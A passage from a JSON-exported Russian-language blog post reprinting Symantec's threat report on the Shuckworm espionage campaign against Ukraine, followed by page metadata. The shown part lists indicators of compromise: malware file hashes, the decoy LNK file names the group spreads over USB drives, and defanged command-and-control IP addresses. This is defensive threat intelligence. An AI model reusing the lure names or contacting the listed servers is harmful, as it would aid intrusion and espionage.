\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445.<\/p>\n<p><strong>\u0417\u0430\u0449\u0438\u0442\u0430\/\u0421\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u0435<\/strong><\/p>\n<p>\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0432 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435 <a href=\"https:\/\/www.broadcom.com\/support\/security-center\/protection-bulletin?#blt9389fde68a777cc4_en-us\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #0000ff;\">Symantec Protection Bulletin<\/span><\/a>.<\/p>\n<p><strong>\u0418\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438<\/strong><br \/>\n<strong>\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b<\/strong><\/p>\n<ul>\n<li>f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192<\/li>\n<li>31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b<\/li>\n<li>c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30<\/li>\n<li>c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8<\/li>\n<li>3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137<\/li>\n<li>3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601<\/li>\n<li>acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8<\/li>\n<\/ul>\n<p><strong>USB propagation scripts<\/strong><\/p>\n<ul>\n<li>28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01<\/li>\n<li>2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581<\/li>\n<li>dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87<\/li>\n<li>a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5<\/li>\n<li>91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86<\/li>\n<\/ul>\n<p><strong>Example of LNK files created<\/strong><\/p>\n<ul>\n<li>7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a<\/li>\n<\/ul>\n<p><strong>LNK file names<\/strong><\/p>\n<ul>\n<li>account.rtf.lnk<\/li>\n<li>account_card.rtf.lnk<\/li>\n<li>application.rtf.lnk<\/li>\n<li>bank_acc\u043eunt.rtf.lnk<\/li>\n<li>blank_cap.rtf.lnk<\/li>\n<li>business trip.rtf.lnk<\/li>\n<li>compromising_evidence.rtf.lnk<\/li>\n<li>conduct.rtf.lnk<\/li>\n<li>cuprovod.rtf.lnk<\/li>\n<li>do_not_delete.rtf.lnk<\/li>\n<li>dsk.rtf.lnk<\/li>\n<li>encouragement.rtf.lnk<\/li>\n<li>form_new.rtf.lnk<\/li>\n<li>instructions.rtf.lnk<\/li>\n<li>journey.mdb<\/li>\n<li>letter to.rtf.lnk<\/li>\n<li>login_password.docx.lnk<\/li>\n<li>login_password.rtf.lnk<\/li>\n<li>mobilization.rtf.lnk<\/li>\n<li>my_documents.rtf.lnk<\/li>\n<li>my_photos.rtf.lnk<\/li>\n<li>not_delete.rtf.lnk<\/li>\n<li>on_account.rtf.lnk<\/li>\n<li>order.rtf.lnk<\/li>\n<li>petition.rtf.lnk<\/li>\n<li>porn_video.rtf.lnk<\/li>\n<li>pornography.rtf.lnk<\/li>\n<li>pornophoto.rtf.lnk<\/li>\n<li>proceedings.rtf.lnk<\/li>\n<li>project_sheet.rtf.lnk<\/li>\n<li>report.docx.lnk<\/li>\n<li>report.rtf.lnk<\/li>\n<li>report_note.rtf.lnk<\/li>\n<li>request.rtf.lnk<\/li>\n<li>resolution.rtf.lnk<\/li>\n<li>secret.rtf.lnk<\/li>\n<li>secretly.rtf.lnk<\/li>\n<li>service.docx.lnk<\/li>\n<li>service.rtf.lnk<\/li>\n<li>sources.rtf.lnk<\/li>\n<li>support.rtf.lnk<\/li>\n<li>weapons_list.rtf.lnk<\/li>\n<\/ul>\n<p><strong>Recent C&amp;C infrastructure (2023)<\/strong><\/p>\n<ul>\n<li>45.76.141[.]166<\/li>\n<li>159.223.112[.]245<\/li>\n<li>140.82.56[.]186<\/li>\n<li>159.203.164[.]194<\/li>\n<li>45.32.94[.]58<\/li>\n<li>45.95.232[.]33<\/li>\n<li>139.59.109[.]100<\/li>\n<li>164.92.245[.]246<\/li>\n<li>45.32.101[.]6<\/li>\n<li>140.82.18[.]48<\/li>\n<li>216.128.140[.]45<\/li>\n<li>146.190.127[.]238<\/li>\n<li>207.148.74[.]68<\/li>\n<li>195.133.88[.]19<\/li>\n<li>146.190.60[.]230<\/li>\n<li>84.32.190[.]137<\/li>\n<li>206.189.154[.]168<\/li>\n<li>188.166.4[.]128<\/li>\n<li>104.248.54[.]250<\/li>\n<li>165.227.76[.]84<\/li>\n<li>66.42.104[.]158<\/li>\n<li>161.35.95[.]47<\/li>\n<li>149.28.125[.]56<\/li>\n<li>143.198.50[.]118<\/li>\n<li>66.42.126[.]121<\/li>\n<li>64.227.72[.]210<\/li>\n<li>81.19.140[.]147<\/li>\n<li>165.232.77[.]197<\/li>\n<li>146.190.117[.]209<\/li>\n<li>134.122.51[.]47<\/li>\n<li>143.198.152[.]232<\/li>\n<li>140.82.47[.]181<\/li>\n<li>159.223.102[.]109<\/li>\n<li>170.64.188[.]146<\/li>\n<li>155.138.194[.]244<\/li>\n<li>45.32.88[.]90<\/li>\n<li>89.185.84[.]32<\/li>\n<li>64.226.84[.]229<\/li>\n<li>206.189.14[.]94<\/li>\n<li>24.199.84[.]132<\/li>\n<li>45.32.41[.]115<\/li>\n<li>84.32.188[.]69<\/li>\n<li>206.189.128[.]172<\/li>\n<li>170.64.168[.]228<\/li>\n<li>161.35.238[.]148<\/li>\n<li>170.64.138[.]138<\/li>\n<li>178.128.86[.]43<\/li>\n<li>206.81.28[.]5<\/li>\n<li>178.128.231[.]180<\/li>\n<li>45.77.115[.]67<\/li>\n<li>136.244.65[.]253<\/li>\n<li>143.244.190[.]199<\/li>\n<li>159.65.176[.]121<\/li>\n<li>192.248.154[.]154<\/li>\n<li>209.97.175[.]128<\/li>\n<li>147.182.240[.]58<\/li>\n<li>146.190.212[.]239<\/li>\n<li>143.198.135[.]132<\/li>\n<li>45.76.202[.]102<\/li>\n<li>142.93.108[.]1<\/li>\n<li>46.101.127[.]147<\/li>\n<li>134.209.0[.]136<\/li>\n<li>138.68.110[.]19<\/li>\n<li>167.99.215[.]50<\/li>\n<li>161.35.232[.]118<\/li>\n<li>88.216.210[.]3<\/li>\n<li>165.227.121[.]87<\/li>\n<li>165.227.48[.]59<\/li>\n<li>108.61.211[.]250<\/li>\n<li>89.185.84[.]48<\/li>\n<li>167.172.69[.]123<\/li>\n<li>89.185.84[.]50<\/li>\n<li>206.189.0[.]134<\/li>\n<li>68.183.200[.]0<\/li>\n<li>178.128.16[.]170<\/li>\n<li>95.179.144[.]161<\/li>\n<li>164.92.222[.]8<\/li>\n<li>45.95.233[.]80<\/li>\n<li>78.141.239[.]24<\/li>\n<li>149.28.181[.]232<\/li>\n<li>24.199.107[.]218<\/li>\n<li>45.32.184[.]140<\/li>\n<li>167.172.20[.]159<\/li>\n<li>84.32.190[.]31<\/li>\n<li>164.92.185[.]60<\/li>\n<li>84.32.131[.]38<\/li>\n<li>137.184.178[.]46<\/li>\n<li>206.189.149[.]103<\/li>\n<li>157.245.176[.]123<\/li>\n<li>45.95.232[.]92<\/li>\n<li>45.95.232[.]29<\/li>\n<li>170.64.150[.]90<\/li>\n<li>89.185.84[.]45<\/li>\n<li>140.82.16[.]120<\/li>\n<li>84.32.185[.]136<\/li>\n<li>134.122.43[.]175<\/li>\n<li>195.133.88[.]55<\/li>\n<li>84.32.191[.]147<\/li>\n<li>78.141.238[.]136<\/li>\n<li>45.82.13[.]84<\/li>\n<li>159.65.248[.]0<\/li>\n<li>84.32.34[.]69<\/li>\n<li>170.64.146[.]194<\/li>\n<li>45.82.13[.]22<\/li>\n<li>45.82.13[.]23<\/li>\n<li>134.209.33[.]42<\/li>\n<li>199.247.8[.]115<\/li>\n<li>84.32.128[.]239<\/li>\n<li>173.199.70[.]238<\/li>\n<li>138.68.174[.]177<\/li>\n<li>178.128.213[.]177<\/li>\n<li>143.110.180[.]68<\/li>\n<li>167.172.144[.]127<\/li>\n<li>165.232.165[.]42<\/li>\n<li>45.95.232[.]51<\/li>\n<li>149.28.98[.]149<\/li>\n<li>104.156.230[.]193<\/li>\n<li>104.248.86[.]158<\/li>\n<li>134.122.51[.]47<\/li>\n<li>134.209.182[.]221<\/li>\n<li>139.59.60[.]191<\/li>\n<li>140.82.11[.]60<\/li>\n<li>140.82.47[.]181<\/li>\n<li>140.82.50[.]37<\/li>\n<li>143.198.135[.]132<\/li>\n<li>143.198.53[.]203<\/li>\n<li>147.182.250[.]33<\/li>\n<li>149.28.130[.]189<\/li>\n<li>149.28.181[.]232<\/li>\n<li>149.28.98[.]149<\/li>\n<li>155.138.194[.]244<\/li>\n<li>157.245.69[.]118<\/li>\n<li>158.247.204[.]242<\/li>\n<li>159.223.102[.]109<\/li>\n<li>159.223.23[.]23<\/li>\n<li>164.92.72[.]212<\/li>\n<li>165.22.72[.]74<\/li>\n<li>165.227.76[.]84<\/li>\n<li>165.232.120[.]169<\/li>\n<li>167.172.58[.]96<\/li>\n<li>167.71.67[.]58<\/li>\n<li>170.64.136[.]186<\/li>\n<li>170.64.140[.]214<\/li>\n<li>170.64.156[.]98<\/li>\n<li>178.128.228[.]252<\/li>\n<li>188.166.176[.]39<\/li>\n<li>188.166.7[.]140<\/li>\n<li>193.149.176[.]26<\/li>\n<li>195.133.88[.]55<\/li>\n<li>202.182.116[.]135<\/li>\n<li>202.182.98[.]100<\/li>\n<li>206.189.80[.]216<\/li>\n<li>207.148.72[.]173<\/li>\n<li>31.129.22[.]46<\/li>\n<li>31.129.22[.]48<\/li>\n<li>31.129.22[.]50<\/li>\n<li>45.32.101[.]6<\/li>\n<li>45.32.117[.]62<\/li>\n<li>45.32.158[.]96<\/li>\n<li>45.32.62[.]100<\/li>\n<li>45.32.88[.]90<\/li>\n<li>45.82.13[.]84<\/li>\n<li>45.95.232[.]33<\/li>\n<li>45.95.232[.]74<\/li>\n<li>45.95.233[.]80<\/li>\n<li>5.199.161[.]29<\/li>\n<li>64.226.84[.]229<\/li>\n<li>64.227.64[.]163<\/li>\n<li>66.42.104[.]158<\/li>\n<li>68.183.200[.]0<\/li>\n<li>78.141.239[.]24<\/li>\n<li>78.153.139[.]7<\/li>\n<li>81.19.140[.]147<\/li>\n<li>84.32.131[.]47<\/li>\n<li>84.32.188[.]13<\/li>\n<li>95.179.144[.]161<\/li>\n<li>95.179.245[.]185<\/li>\n<li>216.128.178[.]248<\/li>\n<\/ul>\n<p><strong>\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a:<\/strong> <a href=\"https:\/\/symantec-enterprise-blogs.security.com\/blogs\/threat-intelligence\/shuckworm-russia-ukraine-military\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #0000ff;\">Shuckworm: Inside Russia\u2019s Relentless Cyber Campaign Against Ukraine<\/span><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u0432\u043e\u0435\u043d\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u0441\u0438\u043b \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u044f. \u0428\u043f\u0438\u043e\u043d\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Shuckworm \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u0442\u044c \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0423\u043a\u0440\u0430\u0438\u043d\u0443, \u0441\u0440\u0435\u0434\u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u2013 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u044b, \u0432\u043e\u0435\u043d\u043d\u044b\u0435 \u0438 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u0412 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 Shuckworm \u0443\u0434\u0430\u0432\u0430\u043b\u043e\u0441\u044c \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u044f, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0432\u0448\u0438\u0435\u0441\u044f \u0434\u043e \u0442\u0440\u0435\u0445 \u043c\u0435\u0441\u044f\u0446\u0435\u0432. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u043f\u044b\u0442\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0438 \u043f\u043e\u0445\u0438\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0442\u0430\u043a\u0443\u044e \u043a\u0430\u043a [&hellip;]<\/p>\n","protected":false},"author":850,"featured_media":9354,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[138],"tags":[],"class_list":["post-9367","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-stati"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u261d \u0411\u043b\u043e\u0433 Oberig IT<\/title>\n<meta name=\"description\" content=\"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u26a1 \u0411\u043b\u043e\u0433 Oberig IT \u0434\u043b\u044f \u043f\u0430\u0440\u0442\u043d\u0435\u0440\u043e\u0432-\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432 \u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0437\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u043e\u0432\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/\" \/>\n<meta property=\"og:locale\" content=\"ru_RU\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u261d \u0411\u043b\u043e\u0433 Oberig IT\" \/>\n<meta property=\"og:description\" content=\"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u26a1 \u0411\u043b\u043e\u0433 Oberig IT \u0434\u043b\u044f \u043f\u0430\u0440\u0442\u043d\u0435\u0440\u043e\u0432-\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432 \u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0437\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u043e\u0432\" \/>\n<meta property=\"og:url\" content=\"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/\" \/>\n<meta property=\"og:site_name\" content=\"Oberig IT\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Oberig.disti\" \/>\n<meta property=\"article:published_time\" content=\"2023-08-28T10:33:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-30T08:43:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/14.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1875\" \/>\n\t<meta property=\"og:image:height\" content=\"625\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Albekova Paula\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u041d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u0430\u0432\u0442\u043e\u0440\u043e\u043c\" \/>\n\t<meta name=\"twitter:data1\" content=\"Albekova Paula\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u041f\u0440\u0438\u043c\u0435\u0440\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 \u043c\u0438\u043d\u0443\u0442\" \/>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u261d \u0411\u043b\u043e\u0433 Oberig IT","description":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u26a1 \u0411\u043b\u043e\u0433 Oberig IT \u0434\u043b\u044f \u043f\u0430\u0440\u0442\u043d\u0435\u0440\u043e\u0432-\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432 \u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0437\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u043e\u0432","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/","og_locale":"ru_RU","og_type":"article","og_title":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u261d \u0411\u043b\u043e\u0433 Oberig IT","og_description":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u26a1 \u0411\u043b\u043e\u0433 Oberig IT \u0434\u043b\u044f \u043f\u0430\u0440\u0442\u043d\u0435\u0440\u043e\u0432-\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432 \u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0437\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u043e\u0432","og_url":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/","og_site_name":"Oberig IT","article_publisher":"https:\/\/www.facebook.com\/Oberig.disti","article_published_time":"2023-08-28T10:33:44+00:00","article_modified_time":"2023-08-30T08:43:06+00:00","og_image":[{"width":1875,"height":625,"url":"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/14.png","type":"image\/png"}],"author":"Albekova Paula","twitter_card":"summary_large_image","twitter_misc":{"\u041d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u0430\u0432\u0442\u043e\u0440\u043e\u043c":"Albekova Paula","\u041f\u0440\u0438\u043c\u0435\u0440\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f":"8 \u043c\u0438\u043d\u0443\u0442"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#article","isPartOf":{"@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/"},"author":{"name":"Albekova Paula","@id":"https:\/\/oberig-it.com\/ru\/#\/schema\/person\/9d804f9c469169d256ca04bc0446793d"},"headline":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b","datePublished":"2023-08-28T10:33:44+00:00","dateModified":"2023-08-30T08:43:06+00:00","mainEntityOfPage":{"@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/"},"wordCount":1661,"commentCount":0,"publisher":{"@id":"https:\/\/oberig-it.com\/ru\/#organization"},"image":{"@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#primaryimage"},"thumbnailUrl":"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/14.png","articleSection":["\u0421\u0442\u0430\u0442\u044c\u0438"],"inLanguage":"ru-RU","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/","url":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/","name":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u261d \u0411\u043b\u043e\u0433 Oberig IT","isPartOf":{"@id":"https:\/\/oberig-it.com\/ru\/#website"},"primaryImageOfPage":{"@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#primaryimage"},"image":{"@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#primaryimage"},"thumbnailUrl":"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/14.png","datePublished":"2023-08-28T10:33:44+00:00","dateModified":"2023-08-30T08:43:06+00:00","description":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u26a1 \u0411\u043b\u043e\u0433 Oberig IT \u0434\u043b\u044f \u043f\u0430\u0440\u0442\u043d\u0435\u0440\u043e\u0432-\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432 \u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0437\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u043e\u0432","breadcrumb":{"@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#breadcrumb"},"inLanguage":"ru-RU","potentialAction":[{"@type":"ReadAction","target":["https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/"]}]},{"@type":"ImageObject","inLanguage":"ru-RU","@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#primaryimage","url":"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/14.png","contentUrl":"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/14.png","width":1875,"height":625},{"@type":"BreadcrumbList","@id":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u0413\u043b\u0430\u0432\u043d\u0430\u044f","item":"https:\/\/oberig-it.com\/ru\/"},{"@type":"ListItem","position":2,"name":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b"}]},{"@type":"WebSite","@id":"https:\/\/oberig-it.com\/ru\/#website","url":"https:\/\/oberig-it.com\/ru\/","name":"Oberig 